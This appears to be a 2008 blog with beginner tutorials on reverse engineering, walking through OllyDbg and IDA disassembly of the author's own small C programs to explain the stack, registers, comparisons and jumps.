This section prepares the data “NickFnord” and the data that we entered by loading the addresses of them into EDI and the pushing them one after another onto the stack.聽 You’ll notice something very handy about Olly in that it performs some of the calculations for you in the bit under the program window so when EIP is pointing at 0040133E for example (i.e. about to execute this line) you will notice that Olly tells you the stack address being referred to by EBP-1E, and the null-terminated array stored at that address as well as the current value of EDI:

Stack address=0012FF52, (ASCII "NickFnord")
EDI=0000005A

This makes debugging a whole lot quicker as you don’t have to manually calculate addresses if you want to know what part of the stack to watch.

at the second LEA command your window should display:

Stack address=0012FF5C, (ASCII "ZZZZZZZZZZZZZZZZZZZZ")
EDI=0012FF52, (ASCII "NickFnord")

Showing that it is now loading the string that we entered.

The call to strcmp compares the two arrays of characters and if we step to the next command we see that it has placed a “1” into the EAX register rather than just changing the zero flag. as a result we merely need to compare the EAX register to a hardcoded 0 in order to set the appropriate flag for jumping.聽 Once again, in these types of comparisons, 0 = no difference and 1 =聽 difference. so when a 1 is returned from the strcmp function we know that the strings are different. and since 1<>0 the zero flag is not set and the program execution jumps.聽 Run the program through again and insert the correct string to prove it for yourself and to see it in action.

00401353聽 |. 68 BFB04000聽聽聽 PUSH hello3.0040B0BF聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /format = "Hello World"
00401358聽 |. E8 24760000聽聽聽 CALL hello3._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
0040135D聽 |. 83C4 04聽聽聽聽聽聽聽 ADD ESP,4
00401360聽 |. EB 0D聽聽聽聽聽聽聽聽聽 JMP SHORT hello3.0040136F
00401362聽 |> 68 AAB04000聽聽聽 PUSH hello3.0040B0AA聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /format = "No Greeting for you"
00401367聽 |. E8 15760000聽聽聽 CALL hello3._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
0040136C聽 |. 83C4 04聽聽聽聽聽聽聽 ADD ESP,4
0040136F聽 |> B8 00000000聽聽聽 MOV EAX,0
00401374聽 |. 5F聽聽聽聽聽聽聽聽聽聽聽聽 POP EDI
00401375聽 |. 5E聽聽聽聽聽聽聽聽聽聽聽聽 POP ESI
00401376聽 |. C9聽聽聽聽聽聽聽聽聽聽聽聽 LEAVE
00401377聽 \. C3聽聽聽聽聽聽聽聽聽聽聽聽 RETN

The remainder of the program is fairly straightforward – as in the previous excersise we see an if-test in action.

Once again, it may be instructive to open the program in IDA to see how it displays it.聽 I’d recommend running through the progam a couple of times in IDA also to become familiar with it in addition to Olly as they each have their advantages.

Now at this point I was going to compile this C program using another tool and see if there were any differences in the resultant binary, but after downloading Microsoft visual C++, removing its firefox plugin that I didn’t ask for, spending 20 mins hunting around for the damn compile button before realising that I needed to “create a solution” before compiling and then not being able to compile it because it doesn’t recognise the strcmp function I gave it up.聽 perhaps I’ll do that another time…..

Once again, I hope this has been educational.聽 Feel free to leave comments!

Nick.

Posted by: nickfnord | September 30, 2008

Binary Analysis Basics

One thing I have found over the couple of times where I have dabbled in reversing, is a common learning strategy for newbies is to get straight into trying crackmes without having a basic understanding of what the hell they’re doing. Guided by poorly written “tuts” or tutorials, often sprinkled liberally with shocking spelling, the tendancy is to try to glean information from seeing it done.聽 From a random sampling of tutorials found on http://www.crackmes.de and other places I have found a very large portion of them do not fully explain what is going on and why the reverser chose to put the breakpoint where he/she did. For example, things like: “I put a brake pnt ther becoz my spidy sense told me to lol, u will haf to figar out why 4 urself” happens supprisingly often. Alternatively the tutorial writer doesn’t write a tutorial, merely posts the answer without any guidance on how to arrive at it.聽 This is fine if you have some experience, but for a newbie it can certainly be frustrating, resulting the newbie being able to at best go through the motions layed out in the tutorial but without understanding what is being done.聽 Don’t get me wrong, there are some exelent tutorials out there, written by people who care that people are reading and following allong, but they are few and far between.

So in order to avoid this, the strategy that I initially started with this time arround was to learn to program in assembly and then go from there. I had hoped that having a solid understanding of assembly language would assist in reversing.聽聽 This has also caused me great frustration to my suprise. The thing is, code written by a human, regardless of the language is compiled by a computer into the most efficient form according to the type of compiler and the optimising options set and sometimes there may be a trade off between things like speed of execution, memory usage and size of the final executable.聽 Certain mathematical operations, for example may be switched arround and handled in completely different ways than a human would logically expect, and comparisons and jumps changed accordingly or code interleaved in order to get more efficiency of execution.

The end result is that the code that the CPU executes may look entirely different from the code that the human wrote.聽 And my conclusion therefore is that if your goal is to learn to reverse, teaching yourself to write programs with assembly language will only be usefull up to a certain point.

The ultimate goal of any reversing session is to understand the program flow enough that you could at least write pseudocode describing its functionality.聽 This level of understanding may not be necessary in all cases depending on your reasons for reversing, but it should still be the goal that you aim for from the start. And so as you will never have the hand-written code to look at, it is more profitable to learn what certain higher level logic looks like after it has been compiled, linked and then dissassembled.

So what I am doing in this post and possibly subsequent posts is going through at a very basic level, the break down of simple instructions as viewed via a dissassembler.

You will need:
————–
A C compiler for windows (I’m using LCC: http://www.cs.virginia.edu/~lcc-win32/)
Ollydbg (http://www.ollydbg.de/)
IDA demo or free (http://www.datarescue.be/downloaddemo.htm)
A good text editor, or you can use the IDE which comes with LCC.
Knowledge of basic programming structure (you don’t have to know C as I’ll explain the relevant bits).
Basic knowledge of assembly language (just have a read through PCASM first and keep it as a reference).
some familiarity with OllyDbg
knowledge of Hex

First we’ll start with the standard Hello World program.

I’m using the command line rather than the gui of LCC because I find it more flexible to work with when just compiling small amounts of code like this.

Install LCC -> right click on “my computer” -> properties -> Advanced tab -> environment variables -> edit the “path” variable and put the directory that you have installed lcc into at the beginning of the line followed by a semicolon e.g. “C:\lcc\bin;”.
Create a file called “compile.bat” in the directory that you will be working in and put the following in it:

lcc -o %1.obj %1.c
lcclnk -o %1.exe %1.obj

Type the following C program into your chosen text editor and save it as hello.c

#include <stdio.h>
int main(void)
{
printf("Hello World\n");
return 0;
}

now you can just type into the command line

compile hello

and it will create a file called hello.exe

This classic program obviously prints “Hello World” out to the screen.聽 But in order for this seemingly simple task to be accomplished there is far more going under the hood, specifically printf is a function contained in the stdio library which will display information to the screen.聽 in the completed binary, the entirety of the printf code will be integrated into the binary.

So lets open it up in ollydbg.

As you can see, there’s quite a bit more stuff in there apart from what we’ve written. Notice that you get placed at what Ollydbg thinks is the entry point for the program. The purpose of this example is not to go through this, but to determine what the compiler has done with our code.

Scroll down until you get to the following:

004012D4聽 /$ 68 A0A04000聽聽聽 PUSH hello.0040A0A0聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /format = "Hello World"
004012D9聽 |. E8 DB5E0000聽聽聽 CALL hello._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
004012DE聽 |. 83C4 04聽聽聽聽聽聽聽 ADD ESP,4
004012E1聽 |. B8 00000000聽聽聽 MOV EAX,0
004012E6聽 \. C3聽聽聽聽聽聽聽聽聽聽聽聽 RETN

This section of the code pushes the data stored in 0040A0A0 onto the stack and then calls the function printf. You can see what is stored in 0040A0A0 by right clicking on the command in ollydbg and selecting “follow in dump -> Immediate Constant”. This information is set when the program is opened. you can See exactly what the _printf function does by stepping into it during runtime (set a break point at that line and hit f7 to step into the code).

Next we’ll add a bit more complexity and demonstrate a few more things at once:

#include <stdio.h>
int main(void)
{
int num;

if (2==2)
{
printf("Hello World\n");
}
else
{
printf("No Greeting for you\n\n");
}

printf("enter a number\n");
scanf("%d",&num);
if (num==2)
{
printf("number = 2\n");
}
else
{
printf("number <> 2\n");
}

printf("The address of number is: %d and the value is %d",&num, num);

return 0;
}

So lets compile this and open it up in olly.

Again we’ve been placed at the entry point to the program. Scroll down until you see the following:

004012D4聽聽 $ 55聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EBP
004012D5聽聽 . 89E5聽聽聽聽聽聽聽聽聽聽 MOV EBP,ESP
004012D7聽聽 . 51聽聽聽聽聽聽聽聽聽聽聽聽 PUSH ECX
004012D8聽聽 . 57聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EDI
004012D9聽聽 . 68 FFB04000聽聽聽 PUSH hello2.0040B0FF聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /format = "Hello World"
004012DE聽聽 . E8 76760000聽聽聽 CALL hello2._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
004012E3聽聽 . 83C4 04聽聽聽聽聽聽聽 ADD ESP,4
004012E6聽聽 . EB 0D聽聽聽聽聽聽聽聽聽 JMP SHORT hello2.004012F5
004012E8聽聽 . 68 E9B04000聽聽聽 PUSH hello2.0040B0E9聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /format = "No Greeting for you"
004012ED聽聽 . E8 67760000聽聽聽 CALL hello2._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
004012F2聽聽 . 83C4 04聽聽聽聽聽聽聽 ADD ESP,4

You can see here that the compiler has made a decision that our if test is not necessary and insted of performing a compare on 2=2, it opts to just always execute the call to prinf with “Hello World” and then puts a JMP command to always skip over the “No Greeting for you” section.聽 This is a very small, trivial example of the kinds of unexpected things that you’ll find in dissassembled code.聽 very likely no programmer would compare to constants like we have, but you can see that the program has been omptimised in a way that may not immediately make sense if we don’t have the source code handy.

004012F5聽聽 > 68 D9B04000聽聽聽 PUSH hello2.0040B0D9聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /format = "enter a number"
004012FA聽聽 . E8 5A760000聽聽聽 CALL hello2._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
004012FF聽聽 . 83C4 04聽聽聽聽聽聽聽 ADD ESP,4
00401302聽聽 . 8D7D FC聽聽聽聽聽聽聽 LEA EDI,DWORD PTR SS:[EBP-4]
00401305聽聽 . 57聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EDI
00401306聽聽 . 68 D6B04000聽聽聽 PUSH hello2.0040B0D6聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /format = "%d"
0040130B聽聽 . E8 70430000聽聽聽 CALL hello2._scanf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_scanf
00401310聽聽 . 83C4 08聽聽聽聽聽聽聽 ADD ESP,8
00401313聽聽 . 837D FC 02聽聽聽聽 CMP DWORD PTR SS:[EBP-4],2

This section takes a number entered by the user and compares it.聽 It’s worth it at this point to set a breakpoint at 004012F5 and step through the program paying close attention to the registers and the stack.

The LEA command is taking the value stored in the address EBP-4 and the following push command is inserting the address value at the top of the stack.

You’ll notice the number you enter is placed in the stack at 0012FF70, yours may be different, but it will always be in the address referenced by the value of EBP-4聽 so in hex 0012FF70 – 4 = 0012FF6C.

The stack now looks like this

0012FF60聽聽 0040B0D6聽 脰掳@.聽 ASCII "%d"
0012FF64聽聽 0012FF6C聽 l每.
0012FF68聽聽 7C910208聽 鈥榺聽 ntdll.7C910208
0012FF6C聽聽 00000002聽 ...
0012FF70聽 /0012FFC0聽 脌每.

olly moves the view of the stack according to what is in the ESP register (which was just incremented by 8 in the previous code), you can scroll up and right-click -> lock stack in order to stop it from moving while debugging.

The memory address 0011FF64 now stores the value of the address that contains the number that we just entered.聽 Something that is important to note at the moment is the difference between a reference to the data stored in a register and reference to the data stored at the memory address that the register holds. They are very different.

For example, having steped through the code to the CMP statement, we would have seen that the ADD ESP,8 command immediately added 8 to the value stored in the ESP register. The CMP command however is not referring to the data stored in EBP, nor is it refering to (the value of the data stored in EBP)-4, but it is referencing the data stored at the memory address in the stack that equals the value of (EBP minus 4).聽 confusing?

If the data stored in EBP is “0012FF70”, then any refference to EBP without square brackets refers to the value 0012FF70.
if the data stored in the memory address 0012FF70 is “0012FFC0”, then a reference to [EBP] with the square brackets is referring to the value “0012FFC0”.
A reference to [EBP-4] first takes the number 4 away from the value stored in EBP, and then finds the value stored at the resultant memory address.聽 in this case EBP contains the hex value “0012FF70” and so EBP-4 = “0012FF6C”.聽 if the data stored at the 0012FF6C stack address is “2”, then a reference to [EBP-4] = “2”.

I hope this is clear because it is a very important concept, and one that may not be clear to people who have only programmed in higher level languages (like myself I’m ashamed to admit).聽 Once again, I recommend that you step through this in Ollydbg paying close attention to the registers and the stack.

Moving right allong then, the rest of the code is as follows:

00401317聽聽 . 75 0F聽聽聽聽聽聽聽聽聽 JNZ SHORT hello2.00401328
00401319聽聽 . 68 CAB04000聽聽聽 PUSH hello2.0040B0CA聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /format = "number = 2"
0040131E聽聽 . E8 36760000聽聽聽 CALL hello2._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
00401323聽聽 . 83C4 04聽聽聽聽聽聽聽 ADD ESP,4
00401326聽聽 . EB 0D聽聽聽聽聽聽聽聽聽 JMP SHORT hello2.00401335
00401328聽聽 > 68 BDB04000聽聽聽 PUSH hello2.0040B0BD聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /format = "number <> 2"
0040132D聽聽 . E8 27760000聽聽聽 CALL hello2._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
00401332聽聽 . 83C4 04聽聽聽聽聽聽聽 ADD ESP,4

Here you see the basics of an if-test at work.聽 As we know, the previous command (CMP DWORD PTR SS:[EBP-4],2) effectively performed the operation [EBP-4]-2, and instead of storing the result, it sets the ZF and CF flags according to the outcome.聽 All we care about for this one is if the difference is zero (ZF flag set to 1).聽 If it is, the program will carry on with the next command, if it is not zero it will Jump (JNZ = Jump if not zero) by setting the next execution address (stored in the EIP register) to 00401328 and then continue on.

If we enter 2 into the program, the comparison will be zero and the program will proceed to tell us that the “number = 2”.聽 after it has finished doing this, it will proceed to the next command after the end of the alternate branch (the LEA command), if it takes the “number <> 2” path, then once it has finished, it just continues with the next command.

If you are following closely at this point, you will notice that there are some unnecessary redundancies in this code.聽 there is a duplicated “ADD ESP, 4”, only one is ever executed due to the if-test so why not remove one and place the other at the end of the if-test?聽 you’ll also notice at this point that the EDI register already contains the value stored in [EBP-4] and so this second LEA command is unnecessary.聽 There are certain strange people in this world who actually care about this sort of thing and they actually have competitions in order to try to reduce the size of executables as much as possible by removing redundancies like this and being as efficient as possible….聽 for the moment, it’s just an interesting point to note:聽 compilers are not absolutely perfect.

Next, we get to our final section of the code.

00401335聽聽 > FF75 FC聽聽聽聽聽聽聽 PUSH DWORD PTR SS:[EBP-4]聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /<%d>
00401338聽聽 . 8D7D FC聽聽聽聽聽聽聽 LEA EDI,DWORD PTR SS:[EBP-4]聽聽聽聽聽聽聽聽聽聽聽聽 ; |
0040133B聽聽 . 57聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EDI聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; |<%d>
0040133C聽聽 . 68 A0B04000聽聽聽 PUSH hello2.0040B0A0聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; |format = "The address of number is: %d and the value is %d"
00401341聽聽 . E8 17760000聽聽聽 CALL hello2._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
00401346聽聽 . 83C4 0C聽聽聽聽聽聽聽 ADD ESP,0C
00401349聽聽 . B8 00000000聽聽聽 MOV EAX,0
0040134E聽聽 . 5F聽聽聽聽聽聽聽聽聽聽聽聽 POP EDI
0040134F聽聽 . C9聽聽聽聽聽聽聽聽聽聽聽聽 LEAVE
00401350聽聽 . C3聽聽聽聽聽聽聽聽聽聽聽聽 RETN

I just added this section of the code to ram home the difference between data stored in registers and the value stored in the memory location stored by the registers.

The first line here is fairly simple – it gets the value that we entered and puts it at the top of the stack, preparing it for being displayed to the user.聽 The second line gets the value of the memory address stored at EBP-4 and puts it into the EDI register.聽 the following line pushes it onto the stack and we’re ready to go.

If you take it one step further, the stack looks like this:

0012FF5C聽聽 0040B0A0聽 |format = "The address of number is: %d and the value is %d"
0012FF60聽聽 0012FF6C聽 |<%d> = 12FF6C (1245036.)
0012FF64聽聽 00000002聽 \<%d> = 2

You’ll notice that the numeral 2 was placed on the stack first followed by the memory address dispite the fact that the address is displayed first in the output string.聽 You can step into the CALL hello2._printf command (by hitting f7 in olly) to see what happens with these values.

You’ll notice that the program, when it completes it’s execution, will output “The address of number is: 125036”聽 if you convert this to hex, you’ll get 12FF6C, which is the memory address where our entered number is stored.

So there’s only one more thing remaining here.聽 We’ve seen what Olly does with the code, let’s have a quick peek at what IDA pro has to offer:

As you can see, IDA puts together a nice graphical program flow – it is very easy to see where in the code various jumps go to.聽 you’ll also notice that it appears to use a different method of dissassembly, or at least it displays the dissassembled code in a different manner than olly does.

these two lines in olly:
00401335聽聽 > FF75 FC聽聽聽聽聽聽聽 PUSH DWORD PTR SS:[EBP-4]聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /<%d>
00401338聽聽 . 8D7D FC聽聽聽聽聽聽聽 LEA EDI,DWORD PTR SS:[EBP-4]聽聽聽聽聽聽聽聽聽聽聽聽 ; |

are somewhat simplified in IDA as:

push [ebp+var_4]
lea聽 edi, [ebp+var_4]

with var_4 being declared at the start as a constant.

I hope this has been helpful – Please feel free to leave a comment, if I’ve made any mistakes in the above, please let me know – I’m always trying to learn more 馃檪

Next time we’ll do the same thing again looking at array structures.

Cheers!
Nick.

Older Posts »

Categories